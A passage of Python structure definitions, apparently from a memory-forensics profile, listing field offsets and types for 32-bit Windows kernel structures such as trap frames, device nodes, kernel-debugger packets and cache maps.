'PreviousTrapFrame' : [ 0x0, ['pointer', ['_KTRAP_FRAME']]],
'PreviousExceptionList' : [ 0x0, ['pointer', ['void']]],
'StackControlFlags' : [ 0x4, ['unsigned long']],
'PreviousLargeStack' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'PreviousSegmentsPresent' : [ 0x4, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'ExpandCalloutStack' : [ 0x4, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'Previous' : [ 0x8, ['_KERNEL_STACK_SEGMENT']],
} ],
'_KTRAP_FRAME' : [ 0x8c, {
'DbgEbp' : [ 0x0, ['unsigned long']],
'DbgEip' : [ 0x4, ['unsigned long']],
'DbgArgMark' : [ 0x8, ['unsigned long']],
'DbgArgPointer' : [ 0xc, ['unsigned long']],
'TempSegCs' : [ 0x10, ['unsigned short']],
'Logging' : [ 0x12, ['unsigned char']],
'Reserved' : [ 0x13, ['unsigned char']],
'TempEsp' : [ 0x14, ['unsigned long']],
'Dr0' : [ 0x18, ['unsigned long']],
'Dr1' : [ 0x1c, ['unsigned long']],
'Dr2' : [ 0x20, ['unsigned long']],
'Dr3' : [ 0x24, ['unsigned long']],
'Dr6' : [ 0x28, ['unsigned long']],
'Dr7' : [ 0x2c, ['unsigned long']],
'SegGs' : [ 0x30, ['unsigned long']],
'SegEs' : [ 0x34, ['unsigned long']],
'SegDs' : [ 0x38, ['unsigned long']],
'Edx' : [ 0x3c, ['unsigned long']],
'Ecx' : [ 0x40, ['unsigned long']],
'Eax' : [ 0x44, ['unsigned long']],
'PreviousPreviousMode' : [ 0x48, ['unsigned long']],
'ExceptionList' : [ 0x4c, ['pointer', ['_EXCEPTION_REGISTRATION_RECORD']]],
'SegFs' : [ 0x50, ['unsigned long']],
'Edi' : [ 0x54, ['unsigned long']],
'Esi' : [ 0x58, ['unsigned long']],
'Ebx' : [ 0x5c, ['unsigned long']],
'Ebp' : [ 0x60, ['unsigned long']],
'ErrCode' : [ 0x64, ['unsigned long']],
'Eip' : [ 0x68, ['unsigned long']],
'SegCs' : [ 0x6c, ['unsigned long']],
'EFlags' : [ 0x70, ['unsigned long']],
'HardwareEsp' : [ 0x74, ['unsigned long']],
'HardwareSegSs' : [ 0x78, ['unsigned long']],
'V86Es' : [ 0x7c, ['unsigned long']],
'V86Ds' : [ 0x80, ['unsigned long']],
'V86Fs' : [ 0x84, ['unsigned long']],
'V86Gs' : [ 0x88, ['unsigned long']],
} ],
'_PNP_DEVICE_COMPLETION_QUEUE' : [ 0x2c, {
'DispatchedList' : [ 0x0, ['_LIST_ENTRY']],
'DispatchedCount' : [ 0x8, ['unsigned long']],
'CompletedList' : [ 0xc, ['_LIST_ENTRY']],
'CompletedSemaphore' : [ 0x14, ['_KSEMAPHORE']],
'SpinLock' : [ 0x28, ['unsigned long']],
} ],
'_KSEMAPHORE' : [ 0x14, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
'Limit' : [ 0x10, ['long']],
} ],
'_DEVOBJ_EXTENSION' : [ 0x3c, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['unsigned short']],
'DeviceObject' : [ 0x4, ['pointer', ['_DEVICE_OBJECT']]],
'PowerFlags' : [ 0x8, ['unsigned long']],
'Dope' : [ 0xc, ['pointer', ['_DEVICE_OBJECT_POWER_EXTENSION']]],
'ExtensionFlags' : [ 0x10, ['unsigned long']],
'DeviceNode' : [ 0x14, ['pointer', ['void']]],
'AttachedTo' : [ 0x18, ['pointer', ['_DEVICE_OBJECT']]],
'StartIoCount' : [ 0x1c, ['long']],
'StartIoKey' : [ 0x20, ['long']],
'StartIoFlags' : [ 0x24, ['unsigned long']],
'Vpb' : [ 0x28, ['pointer', ['_VPB']]],
'DependentList' : [ 0x2c, ['_LIST_ENTRY']],
'ProviderList' : [ 0x34, ['_LIST_ENTRY']],
} ],
'__unnamed_1740' : [ 0x4, {
'LegacyDeviceNode' : [ 0x0, ['pointer', ['_DEVICE_NODE']]],
'PendingDeviceRelations' : [ 0x0, ['pointer', ['_DEVICE_RELATIONS']]],
'Information' : [ 0x0, ['pointer', ['void']]],
} ],
'__unnamed_1742' : [ 0x4, {
'NextResourceDeviceNode' : [ 0x0, ['pointer', ['_DEVICE_NODE']]],
} ],
'__unnamed_1746' : [ 0x10, {
'DockStatus' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'DOCK_NOTDOCKDEVICE', 1: 'DOCK_QUIESCENT', 2: 'DOCK_ARRIVING', 3: 'DOCK_DEPARTING', 4: 'DOCK_EJECTIRP_COMPLETED'})]],
'ListEntry' : [ 0x4, ['_LIST_ENTRY']],
'SerialNumber' : [ 0xc, ['pointer', ['unsigned short']]],
} ],
'_DEVICE_NODE' : [ 0x188, {
'Sibling' : [ 0x0, ['pointer', ['_DEVICE_NODE']]],
'Child' : [ 0x4, ['pointer', ['_DEVICE_NODE']]],
'Parent' : [ 0x8, ['pointer', ['_DEVICE_NODE']]],
'LastChild' : [ 0xc, ['pointer', ['_DEVICE_NODE']]],
'PhysicalDeviceObject' : [ 0x10, ['pointer', ['_DEVICE_OBJECT']]],
'InstancePath' : [ 0x14, ['_UNICODE_STRING']],
'ServiceName' : [ 0x1c, ['_UNICODE_STRING']],
'PendingIrp' : [ 0x24, ['pointer', ['_IRP']]],
'Level' : [ 0x28, ['unsigned long']],
'Notify' : [ 0x2c, ['_PO_DEVICE_NOTIFY']],
'PoIrpManager' : [ 0x68, ['_PO_IRP_MANAGER']],
'State' : [ 0x78, ['Enumeration', dict(target = 'long', choices = {768: 'DeviceNodeUnspecified', 769: 'DeviceNodeUninitialized', 770: 'DeviceNodeInitialized', 771: 'DeviceNodeDriversAdded', 772: 'DeviceNodeResourcesAssigned', 773: 'DeviceNodeStartPending', 774: 'DeviceNodeStartCompletion', 775: 'DeviceNodeStartPostWork', 776: 'DeviceNodeStarted', 777: 'DeviceNodeQueryStopped', 778: 'DeviceNodeStopped', 779: 'DeviceNodeRestartCompletion', 780: 'DeviceNodeEnumeratePending', 781: 'DeviceNodeEnumerateCompletion', 782: 'DeviceNodeAwaitingQueuedDeletion', 783: 'DeviceNodeAwaitingQueuedRemoval', 784: 'DeviceNodeQueryRemoved', 785: 'DeviceNodeRemovePendingCloses', 786: 'DeviceNodeRemoved', 787: 'DeviceNodeDeletePendingCloses', 788: 'DeviceNodeDeleted', 789: 'MaxDeviceNodeState'})]],
'PreviousState' : [ 0x7c, ['Enumeration', dict(target = 'long', choices = {768: 'DeviceNodeUnspecified', 769: 'DeviceNodeUninitialized', 770: 'DeviceNodeInitialized', 771: 'DeviceNodeDriversAdded', 772: 'DeviceNodeResourcesAssigned', 773: 'DeviceNodeStartPending', 774: 'DeviceNodeStartCompletion', 775: 'DeviceNodeStartPostWork', 776: 'DeviceNodeStarted', 777: 'DeviceNodeQueryStopped', 778: 'DeviceNodeStopped', 779: 'DeviceNodeRestartCompletion', 780: 'DeviceNodeEnumeratePending', 781: 'DeviceNodeEnumerateCompletion', 782: 'DeviceNodeAwaitingQueuedDeletion', 783: 'DeviceNodeAwaitingQueuedRemoval', 784: 'DeviceNodeQueryRemoved', 785: 'DeviceNodeRemovePendingCloses', 786: 'DeviceNodeRemoved', 787: 'DeviceNodeDeletePendingCloses', 788: 'DeviceNodeDeleted', 789: 'MaxDeviceNodeState'})]],
'StateHistory' : [ 0x80, ['array', -80, ['Enumeration', dict(target = 'long', choices = {768: 'DeviceNodeUnspecified', 769: 'DeviceNodeUninitialized', 770: 'DeviceNodeInitialized', 771: 'DeviceNodeDriversAdded', 772: 'DeviceNodeResourcesAssigned', 773: 'DeviceNodeStartPending', 774: 'DeviceNodeStartCompletion', 775: 'DeviceNodeStartPostWork', 776: 'DeviceNodeStarted', 777: 'DeviceNodeQueryStopped', 778: 'DeviceNodeStopped', 779: 'DeviceNodeRestartCompletion', 780: 'DeviceNodeEnumeratePending', 781: 'DeviceNodeEnumerateCompletion', 782: 'DeviceNodeAwaitingQueuedDeletion', 783: 'DeviceNodeAwaitingQueuedRemoval', 784: 'DeviceNodeQueryRemoved', 785: 'DeviceNodeRemovePendingCloses', 786: 'DeviceNodeRemoved', 787: 'DeviceNodeDeletePendingCloses', 788: 'DeviceNodeDeleted', 789: 'MaxDeviceNodeState'})]]],
'StateHistoryEntry' : [ 0xd0, ['unsigned long']],
'CompletionStatus' : [ 0xd4, ['long']],
'Flags' : [ 0xd8, ['unsigned long']],
'UserFlags' : [ 0xdc, ['unsigned long']],
'Problem' : [ 0xe0, ['unsigned long']],
'ResourceList' : [ 0xe4, ['pointer', ['_CM_RESOURCE_LIST']]],
'ResourceListTranslated' : [ 0xe8, ['pointer', ['_CM_RESOURCE_LIST']]],
'DuplicatePDO' : [ 0xec, ['pointer', ['_DEVICE_OBJECT']]],
'ResourceRequirements' : [ 0xf0, ['pointer', ['_IO_RESOURCE_REQUIREMENTS_LIST']]],
'InterfaceType' : [ 0xf4, ['Enumeration', dict(target = 'long', choices = {0: 'Internal', 1: 'Isa', 2: 'Eisa', 3: 'MicroChannel', 4: 'TurboChannel', 5: 'PCIBus', 6: 'VMEBus', 7: 'NuBus', 8: 'PCMCIABus', 9: 'CBus', 10: 'MPIBus', 11: 'MPSABus', 12: 'ProcessorInternal', 13: 'InternalPowerBus', 14: 'PNPISABus', 15: 'PNPBus', 16: 'Vmcs', 17: 'MaximumInterfaceType', -1: 'InterfaceTypeUndefined'})]],
'BusNumber' : [ 0xf8, ['unsigned long']],
'ChildInterfaceType' : [ 0xfc, ['Enumeration', dict(target = 'long', choices = {0: 'Internal', 1: 'Isa', 2: 'Eisa', 3: 'MicroChannel', 4: 'TurboChannel', 5: 'PCIBus', 6: 'VMEBus', 7: 'NuBus', 8: 'PCMCIABus', 9: 'CBus', 10: 'MPIBus', 11: 'MPSABus', 12: 'ProcessorInternal', 13: 'InternalPowerBus', 14: 'PNPISABus', 15: 'PNPBus', 16: 'Vmcs', 17: 'MaximumInterfaceType', -1: 'InterfaceTypeUndefined'})]],
'ChildBusNumber' : [ 0x100, ['unsigned long']],
'ChildBusTypeIndex' : [ 0x104, ['unsigned short']],
'RemovalPolicy' : [ 0x106, ['unsigned char']],
'HardwareRemovalPolicy' : [ 0x107, ['unsigned char']],
'TargetDeviceNotify' : [ 0x108, ['_LIST_ENTRY']],
'DeviceArbiterList' : [ 0x110, ['_LIST_ENTRY']],
'DeviceTranslatorList' : [ 0x118, ['_LIST_ENTRY']],
'NoTranslatorMask' : [ 0x120, ['unsigned short']],
'QueryTranslatorMask' : [ 0x122, ['unsigned short']],
'NoArbiterMask' : [ 0x124, ['unsigned short']],
'QueryArbiterMask' : [ 0x126, ['unsigned short']],
'OverUsed1' : [ 0x128, ['__unnamed_1740']],
'OverUsed2' : [ 0x12c, ['__unnamed_1742']],
'BootResources' : [ 0x130, ['pointer', ['_CM_RESOURCE_LIST']]],
'BootResourcesTranslated' : [ 0x134, ['pointer', ['_CM_RESOURCE_LIST']]],
'CapabilityFlags' : [ 0x138, ['unsigned long']],
'DockInfo' : [ 0x13c, ['__unnamed_1746']],
'DisableableDepends' : [ 0x14c, ['unsigned long']],
'PendedSetInterfaceState' : [ 0x150, ['_LIST_ENTRY']],
'LegacyBusListEntry' : [ 0x158, ['_LIST_ENTRY']],
'DriverUnloadRetryCount' : [ 0x160, ['unsigned long']],
'PreviousParent' : [ 0x164, ['pointer', ['_DEVICE_NODE']]],
'DeletedChildren' : [ 0x168, ['unsigned long']],
'NumaNodeIndex' : [ 0x16c, ['unsigned long']],
'ContainerID' : [ 0x170, ['_GUID']],
'OverrideFlags' : [ 0x180, ['unsigned char']],
'RequiresUnloadedDriver' : [ 0x181, ['unsigned char']],
'PendingEjectRelations' : [ 0x184, ['pointer', ['_PENDING_RELATIONS_LIST_ENTRY']]],
} ],
'_KNODE' : [ 0x80, {
'PagedPoolSListHead' : [ 0x0, ['_SLIST_HEADER']],
'NonPagedPoolSListHead' : [ 0x8, ['array', 3, ['_SLIST_HEADER']]],
'Affinity' : [ 0x20, ['_GROUP_AFFINITY']],
'ProximityId' : [ 0x2c, ['unsigned long']],
'NodeNumber' : [ 0x30, ['unsigned short']],
'PrimaryNodeNumber' : [ 0x32, ['unsigned short']],
'MaximumProcessors' : [ 0x34, ['unsigned char']],
'Color' : [ 0x35, ['unsigned char']],
'Flags' : [ 0x36, ['_flags']],
'NodePad0' : [ 0x37, ['unsigned char']],
'Seed' : [ 0x38, ['unsigned long']],
'MmShiftedColor' : [ 0x3c, ['unsigned long']],
'FreeCount' : [ 0x40, ['array', 2, ['unsigned long']]],
'CachedKernelStacks' : [ 0x48, ['_CACHED_KSTACK_LIST']],
'ParkLock' : [ 0x60, ['long']],
'NodePad1' : [ 0x64, ['unsigned long']],
} ],
'_PNP_ASSIGN_RESOURCES_CONTEXT' : [ 0xc, {
'IncludeFailedDevices' : [ 0x0, ['unsigned long']],
'DeviceCount' : [ 0x4, ['unsigned long']],
'DeviceList' : [ 0x8, ['array', 1, ['pointer', ['_DEVICE_OBJECT']]]],
} ],
'_PNP_RESOURCE_REQUEST' : [ 0x28, {
'PhysicalDevice' : [ 0x0, ['pointer', ['_DEVICE_OBJECT']]],
'Flags' : [ 0x4, ['unsigned long']],
'AllocationType' : [ 0x8, ['Enumeration', dict(target = 'long', choices = {0: 'ArbiterRequestLegacyReported', 1: 'ArbiterRequestHalReported', 2: 'ArbiterRequestLegacyAssigned', 3: 'ArbiterRequestPnpDetected', 4: 'ArbiterRequestPnpEnumerated', -1: 'ArbiterRequestUndefined'})]],
'Priority' : [ 0xc, ['unsigned long']],
'Position' : [ 0x10, ['unsigned long']],
'ResourceRequirements' : [ 0x14, ['pointer', ['_IO_RESOURCE_REQUIREMENTS_LIST']]],
'ReqList' : [ 0x18, ['pointer', ['void']]],
'ResourceAssignment' : [ 0x1c, ['pointer', ['_CM_RESOURCE_LIST']]],
'TranslatedResourceAssignment' : [ 0x20, ['pointer', ['_CM_RESOURCE_LIST']]],
'Status' : [ 0x24, ['long']],
} ],
'_IO_RESOURCE_REQUIREMENTS_LIST' : [ 0x48, {
'ListSize' : [ 0x0, ['unsigned long']],
'InterfaceType' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'Internal', 1: 'Isa', 2: 'Eisa', 3: 'MicroChannel', 4: 'TurboChannel', 5: 'PCIBus', 6: 'VMEBus', 7: 'NuBus', 8: 'PCMCIABus', 9: 'CBus', 10: 'MPIBus', 11: 'MPSABus', 12: 'ProcessorInternal', 13: 'InternalPowerBus', 14: 'PNPISABus', 15: 'PNPBus', 16: 'Vmcs', 17: 'MaximumInterfaceType', -1: 'InterfaceTypeUndefined'})]],
'BusNumber' : [ 0x8, ['unsigned long']],
'SlotNumber' : [ 0xc, ['unsigned long']],
'Reserved' : [ 0x10, ['array', 3, ['unsigned long']]],
'AlternativeLists' : [ 0x1c, ['unsigned long']],
'List' : [ 0x20, ['array', 1, ['_IO_RESOURCE_LIST']]],
} ],
'_EXCEPTION_RECORD64' : [ 0x98, {
'ExceptionCode' : [ 0x0, ['long']],
'ExceptionFlags' : [ 0x4, ['unsigned long']],
'ExceptionRecord' : [ 0x8, ['unsigned long long']],
'ExceptionAddress' : [ 0x10, ['unsigned long long']],
'NumberParameters' : [ 0x18, ['unsigned long']],
'__unusedAlignment' : [ 0x1c, ['unsigned long']],
'ExceptionInformation' : [ 0x20, ['array', 15, ['unsigned long long']]],
} ],
'_EXCEPTION_RECORD32' : [ 0x50, {
'ExceptionCode' : [ 0x0, ['long']],
'ExceptionFlags' : [ 0x4, ['unsigned long']],
'ExceptionRecord' : [ 0x8, ['unsigned long']],
'ExceptionAddress' : [ 0xc, ['unsigned long']],
'NumberParameters' : [ 0x10, ['unsigned long']],
'ExceptionInformation' : [ 0x14, ['array', 15, ['unsigned long']]],
} ],
'_DBGKM_EXCEPTION64' : [ 0xa0, {
'ExceptionRecord' : [ 0x0, ['_EXCEPTION_RECORD64']],
'FirstChance' : [ 0x98, ['unsigned long']],
} ],
'_DBGKM_EXCEPTION32' : [ 0x54, {
'ExceptionRecord' : [ 0x0, ['_EXCEPTION_RECORD32']],
'FirstChance' : [ 0x50, ['unsigned long']],
} ],
'_DBGKD_LOAD_SYMBOLS64' : [ 0x28, {
'PathNameLength' : [ 0x0, ['unsigned long']],
'BaseOfDll' : [ 0x8, ['unsigned long long']],
'ProcessId' : [ 0x10, ['unsigned long long']],
'CheckSum' : [ 0x18, ['unsigned long']],
'SizeOfImage' : [ 0x1c, ['unsigned long']],
'UnloadSymbols' : [ 0x20, ['unsigned char']],
} ],
'_DBGKD_LOAD_SYMBOLS32' : [ 0x18, {
'PathNameLength' : [ 0x0, ['unsigned long']],
'BaseOfDll' : [ 0x4, ['unsigned long']],
'ProcessId' : [ 0x8, ['unsigned long']],
'CheckSum' : [ 0xc, ['unsigned long']],
'SizeOfImage' : [ 0x10, ['unsigned long']],
'UnloadSymbols' : [ 0x14, ['unsigned char']],
} ],
'_DBGKD_READ_MEMORY64' : [ 0x10, {
'TargetBaseAddress' : [ 0x0, ['unsigned long long']],
'TransferCount' : [ 0x8, ['unsigned long']],
'ActualBytesRead' : [ 0xc, ['unsigned long']],
} ],
'_DBGKD_READ_MEMORY32' : [ 0xc, {
'TargetBaseAddress' : [ 0x0, ['unsigned long']],
'TransferCount' : [ 0x4, ['unsigned long']],
'ActualBytesRead' : [ 0x8, ['unsigned long']],
} ],
'_DBGKD_WRITE_MEMORY64' : [ 0x10, {
'TargetBaseAddress' : [ 0x0, ['unsigned long long']],
'TransferCount' : [ 0x8, ['unsigned long']],
'ActualBytesWritten' : [ 0xc, ['unsigned long']],
} ],
'_DBGKD_WRITE_MEMORY32' : [ 0xc, {
'TargetBaseAddress' : [ 0x0, ['unsigned long']],
'TransferCount' : [ 0x4, ['unsigned long']],
'ActualBytesWritten' : [ 0x8, ['unsigned long']],
} ],
'_DBGKD_WRITE_BREAKPOINT64' : [ 0x10, {
'BreakPointAddress' : [ 0x0, ['unsigned long long']],
'BreakPointHandle' : [ 0x8, ['unsigned long']],
} ],
'_DBGKD_WRITE_BREAKPOINT32' : [ 0x8, {
'BreakPointAddress' : [ 0x0, ['unsigned long']],
'BreakPointHandle' : [ 0x4, ['unsigned long']],
} ],
'_DBGKD_READ_WRITE_IO64' : [ 0x10, {
'IoAddress' : [ 0x0, ['unsigned long long']],
'DataSize' : [ 0x8, ['unsigned long']],
'DataValue' : [ 0xc, ['unsigned long']],
} ],
'_DBGKD_READ_WRITE_IO32' : [ 0xc, {
'DataSize' : [ 0x0, ['unsigned long']],
'IoAddress' : [ 0x4, ['unsigned long']],
'DataValue' : [ 0x8, ['unsigned long']],
} ],
'_DBGKD_READ_WRITE_IO_EXTENDED64' : [ 0x20, {
'DataSize' : [ 0x0, ['unsigned long']],
'InterfaceType' : [ 0x4, ['unsigned long']],
'BusNumber' : [ 0x8, ['unsigned long']],
'AddressSpace' : [ 0xc, ['unsigned long']],
'IoAddress' : [ 0x10, ['unsigned long long']],
'DataValue' : [ 0x18, ['unsigned long']],
} ],
'_DBGKD_READ_WRITE_IO_EXTENDED32' : [ 0x18, {
'DataSize' : [ 0x0, ['unsigned long']],
'InterfaceType' : [ 0x4, ['unsigned long']],
'BusNumber' : [ 0x8, ['unsigned long']],
'AddressSpace' : [ 0xc, ['unsigned long']],
'IoAddress' : [ 0x10, ['unsigned long']],
'DataValue' : [ 0x14, ['unsigned long']],
} ],
'_DBGKD_SET_SPECIAL_CALL32' : [ 0x4, {
'SpecialCall' : [ 0x0, ['unsigned long']],
} ],
'_DBGKD_SET_SPECIAL_CALL64' : [ 0x8, {
'SpecialCall' : [ 0x0, ['unsigned long long']],
} ],
'_DBGKD_SET_INTERNAL_BREAKPOINT32' : [ 0x8, {
'BreakpointAddress' : [ 0x0, ['unsigned long']],
'Flags' : [ 0x4, ['unsigned long']],
} ],
'_DBGKD_SET_INTERNAL_BREAKPOINT64' : [ 0x10, {
'BreakpointAddress' : [ 0x0, ['unsigned long long']],
'Flags' : [ 0x8, ['unsigned long']],
} ],
'_DBGKD_GET_INTERNAL_BREAKPOINT64' : [ 0x20, {
'BreakpointAddress' : [ 0x0, ['unsigned long long']],
'Flags' : [ 0x8, ['unsigned long']],
'Calls' : [ 0xc, ['unsigned long']],
'MaxCallsPerPeriod' : [ 0x10, ['unsigned long']],
'MinInstructions' : [ 0x14, ['unsigned long']],
'MaxInstructions' : [ 0x18, ['unsigned long']],
'TotalInstructions' : [ 0x1c, ['unsigned long']],
} ],
'_DBGKD_GET_INTERNAL_BREAKPOINT32' : [ 0x1c, {
'BreakpointAddress' : [ 0x0, ['unsigned long']],
'Flags' : [ 0x4, ['unsigned long']],
'Calls' : [ 0x8, ['unsigned long']],
'MaxCallsPerPeriod' : [ 0xc, ['unsigned long']],
'MinInstructions' : [ 0x10, ['unsigned long']],
'MaxInstructions' : [ 0x14, ['unsigned long']],
'TotalInstructions' : [ 0x18, ['unsigned long']],
} ],
'__unnamed_17ef' : [ 0x28, {
'ReadMemory' : [ 0x0, ['_DBGKD_READ_MEMORY64']],
'WriteMemory' : [ 0x0, ['_DBGKD_WRITE_MEMORY64']],
'GetContext' : [ 0x0, ['_DBGKD_GET_CONTEXT']],
'SetContext' : [ 0x0, ['_DBGKD_SET_CONTEXT']],
'WriteBreakPoint' : [ 0x0, ['_DBGKD_WRITE_BREAKPOINT64']],
'RestoreBreakPoint' : [ 0x0, ['_DBGKD_RESTORE_BREAKPOINT']],
'Continue' : [ 0x0, ['_DBGKD_CONTINUE']],
'Continue2' : [ 0x0, ['_DBGKD_CONTINUE2']],
'ReadWriteIo' : [ 0x0, ['_DBGKD_READ_WRITE_IO64']],
'ReadWriteIoExtended' : [ 0x0, ['_DBGKD_READ_WRITE_IO_EXTENDED64']],
'QuerySpecialCalls' : [ 0x0, ['_DBGKD_QUERY_SPECIAL_CALLS']],
'SetSpecialCall' : [ 0x0, ['_DBGKD_SET_SPECIAL_CALL64']],
'SetInternalBreakpoint' : [ 0x0, ['_DBGKD_SET_INTERNAL_BREAKPOINT64']],
'GetInternalBreakpoint' : [ 0x0, ['_DBGKD_GET_INTERNAL_BREAKPOINT64']],
'GetVersion64' : [ 0x0, ['_DBGKD_GET_VERSION64']],
'BreakPointEx' : [ 0x0, ['_DBGKD_BREAKPOINTEX']],
'ReadWriteMsr' : [ 0x0, ['_DBGKD_READ_WRITE_MSR']],
'SearchMemory' : [ 0x0, ['_DBGKD_SEARCH_MEMORY']],
'GetSetBusData' : [ 0x0, ['_DBGKD_GET_SET_BUS_DATA']],
'FillMemory' : [ 0x0, ['_DBGKD_FILL_MEMORY']],
'QueryMemory' : [ 0x0, ['_DBGKD_QUERY_MEMORY']],
'SwitchPartition' : [ 0x0, ['_DBGKD_SWITCH_PARTITION']],
} ],
'_DBGKD_MANIPULATE_STATE64' : [ 0x38, {
'ApiNumber' : [ 0x0, ['unsigned long']],
'ProcessorLevel' : [ 0x4, ['unsigned short']],
'Processor' : [ 0x6, ['unsigned short']],
'ReturnStatus' : [ 0x8, ['long']],
'u' : [ 0x10, ['__unnamed_17ef']],
} ],
'__unnamed_17f6' : [ 0x28, {
'ReadMemory' : [ 0x0, ['_DBGKD_READ_MEMORY32']],
'WriteMemory' : [ 0x0, ['_DBGKD_WRITE_MEMORY32']],
'ReadMemory64' : [ 0x0, ['_DBGKD_READ_MEMORY64']],
'WriteMemory64' : [ 0x0, ['_DBGKD_WRITE_MEMORY64']],
'GetContext' : [ 0x0, ['_DBGKD_GET_CONTEXT']],
'SetContext' : [ 0x0, ['_DBGKD_SET_CONTEXT']],
'WriteBreakPoint' : [ 0x0, ['_DBGKD_WRITE_BREAKPOINT32']],
'RestoreBreakPoint' : [ 0x0, ['_DBGKD_RESTORE_BREAKPOINT']],
'Continue' : [ 0x0, ['_DBGKD_CONTINUE']],
'Continue2' : [ 0x0, ['_DBGKD_CONTINUE2']],
'ReadWriteIo' : [ 0x0, ['_DBGKD_READ_WRITE_IO32']],
'ReadWriteIoExtended' : [ 0x0, ['_DBGKD_READ_WRITE_IO_EXTENDED32']],
'QuerySpecialCalls' : [ 0x0, ['_DBGKD_QUERY_SPECIAL_CALLS']],
'SetSpecialCall' : [ 0x0, ['_DBGKD_SET_SPECIAL_CALL32']],
'SetInternalBreakpoint' : [ 0x0, ['_DBGKD_SET_INTERNAL_BREAKPOINT32']],
'GetInternalBreakpoint' : [ 0x0, ['_DBGKD_GET_INTERNAL_BREAKPOINT32']],
'GetVersion32' : [ 0x0, ['_DBGKD_GET_VERSION32']],
'BreakPointEx' : [ 0x0, ['_DBGKD_BREAKPOINTEX']],
'ReadWriteMsr' : [ 0x0, ['_DBGKD_READ_WRITE_MSR']],
'SearchMemory' : [ 0x0, ['_DBGKD_SEARCH_MEMORY']],
} ],
'_DBGKD_MANIPULATE_STATE32' : [ 0x34, {
'ApiNumber' : [ 0x0, ['unsigned long']],
'ProcessorLevel' : [ 0x4, ['unsigned short']],
'Processor' : [ 0x6, ['unsigned short']],
'ReturnStatus' : [ 0x8, ['long']],
'u' : [ 0xc, ['__unnamed_17f6']],
} ],
'_DBGKD_READ_WRITE_MSR' : [ 0xc, {
'Msr' : [ 0x0, ['unsigned long']],
'DataValueLow' : [ 0x4, ['unsigned long']],
'DataValueHigh' : [ 0x8, ['unsigned long']],
} ],
'_DBGKD_BREAKPOINTEX' : [ 0x8, {
'BreakPointCount' : [ 0x0, ['unsigned long']],
'ContinueStatus' : [ 0x4, ['long']],
} ],
'_DBGKD_SEARCH_MEMORY' : [ 0x18, {
'SearchAddress' : [ 0x0, ['unsigned long long']],
'FoundAddress' : [ 0x0, ['unsigned long long']],
'SearchLength' : [ 0x8, ['unsigned long long']],
'PatternLength' : [ 0x10, ['unsigned long']],
} ],
'_DBGKD_RESTORE_BREAKPOINT' : [ 0x4, {
'BreakPointHandle' : [ 0x0, ['unsigned long']],
} ],
'_DBGKD_CONTINUE' : [ 0x4, {
'ContinueStatus' : [ 0x0, ['long']],
} ],
'_DBGKD_CONTINUE2' : [ 0x20, {
'ContinueStatus' : [ 0x0, ['long']],
'ControlSet' : [ 0x4, ['_X86_DBGKD_CONTROL_SET']],
'AnyControlSet' : [ 0x4, ['_DBGKD_ANY_CONTROL_SET']],
} ],
'_POP_CPU_INFO' : [ 0x10, {
'Eax' : [ 0x0, ['unsigned long']],
'Ebx' : [ 0x4, ['unsigned long']],
'Ecx' : [ 0x8, ['unsigned long']],
'Edx' : [ 0xc, ['unsigned long']],
} ],
'_VOLUME_CACHE_MAP' : [ 0x20, {
'NodeTypeCode' : [ 0x0, ['short']],
'NodeByteCode' : [ 0x2, ['short']],
'UseCount' : [ 0x4, ['unsigned long']],
'DeviceObject' : [ 0x8, ['pointer', ['_DEVICE_OBJECT']]],
'VolumeCacheMapLinks' : [ 0xc, ['_LIST_ENTRY']],
'Flags' : [ 0x14, ['unsigned long']],
'DirtyPages' : [ 0x18, ['unsigned long']],
'PagesQueuedToDisk' : [ 0x1c, ['unsigned long']],
} ],
'_SHARED_CACHE_MAP' : [ 0x158, {
'NodeTypeCode' : [ 0x0, ['short']],
'NodeByteSize' : [ 0x2, ['short']],
'OpenCount' : [ 0x4, ['unsigned long']],
'FileSize' : [ 0x8, ['_LARGE_INTEGER']],
'BcbList' : [ 0x10, ['_LIST_ENTRY']],
'SectionSize' : [ 0x18, ['_LARGE_INTEGER']],
'ValidDataLength' : [ 0x20, ['_LARGE_INTEGER']],
'ValidDataGoal' : [ 0x28, ['_LARGE_INTEGER']],
'InitialVacbs' : [ 0x30, ['array', 4, ['pointer', ['_VACB']]]],
'Vacbs' : [ 0x40, ['pointer', ['pointer', ['_VACB']]]],
'FileObjectFastRef' : [ 0x44, ['_EX_FAST_REF']],
'VacbLock' : [ 0x48, ['_EX_PUSH_LOCK']],
'DirtyPages' : [ 0x4c, ['unsigned long']],
'LoggedStreamLinks' : [ 0x50, ['_LIST_ENTRY']],
'SharedCacheMapLinks' : [ 0x58, ['_LIST_ENTRY']],
'Flags' : [ 0x60, ['unsigned long']],
'Status' : [ 0x64, ['long']],
'Mbcb' : [ 0x68, ['pointer', ['_MBCB']]],
'Section' : [ 0x6c, ['pointer', ['void']]],
'CreateEvent' : [ 0x70, ['pointer', ['_KEVENT']]],
'WaitOnActiveCount' : [ 0x74, ['pointer', ['_KEVENT']]],
'PagesToWrite' : [ 0x78, ['unsigned long']],
'BeyondLastFlush' : [ 0x80, ['long long']],
'Callbacks' : [ 0x88, ['pointer', ['_CACHE_MANAGER_CALLBACKS']]],
'LazyWriteContext' : [ 0x8c, ['pointer', ['void']]],
'PrivateList' : [ 0x90, ['_LIST_ENTRY']],
'LogHandle' : [ 0x98, ['pointer', ['void']]],
'FlushToLsnRoutine' : [ 0x9c, ['pointer', ['void']]],
'DirtyPageThreshold' : [ 0xa0, ['unsigned long']],
'LazyWritePassCount' : [ 0xa4, ['unsigned long']],
'UninitializeEvent' : [ 0xa8, ['pointer', ['_CACHE_UNINITIALIZE_EVENT']]],
'BcbLock' : [ 0xac, ['_KGUARDED_MUTEX']],
'LastUnmapBehindOffset' : [ 0xd0, ['_LARGE_INTEGER']],
'Event' : [ 0xd8, ['_KEVENT']],
'HighWaterMappingOffset' : [ 0xe8, ['_LARGE_INTEGER']],
'PrivateCacheMap' : [ 0xf0, ['_PRIVATE_CACHE_MAP']],
'WriteBehindWorkQueueEntry' : [ 0x148, ['pointer', ['void']]],
'VolumeCacheMap' : [ 0x14c, ['pointer', ['_VOLUME_CACHE_MAP']]],
'ProcImagePathHash' : [ 0x150, ['unsigned long']],
